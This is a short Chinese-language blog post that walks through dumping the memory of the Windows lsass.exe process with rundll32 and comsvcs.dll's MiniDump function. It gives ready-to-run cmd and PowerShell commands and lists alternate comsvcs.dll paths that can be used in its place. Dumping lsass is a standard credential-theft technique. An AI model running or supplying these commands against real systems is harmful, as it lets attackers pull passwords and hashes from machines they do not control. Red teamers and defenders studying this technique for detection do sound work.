comsvcs.dll实现dump指定进程内存文件

 · 2021-1-25 · 次阅读


使用rundll32先dump出lsass.exe:

image-20210125113835503

先查出lsass.exe的PID

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 796 C:\lsass.dmp full

image-20210125114059798

在导出这个之前需要查看调试程序这一项是否打开。我的cmd就是打开的。不行的话可以用powershell。powershell默认就是打开的。

image-20210125114731732

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 796 C:\lsass.dmp full"

image-20210125114623289

当然也不仅仅使用comsvcs.dll还可以用如下dll:

C:\Windows\Syswow64\comsvcs.dll
C:\Windows\winsxs\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\comsvcs.dll
C:\Windows\winsxs\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\comsvcs.dll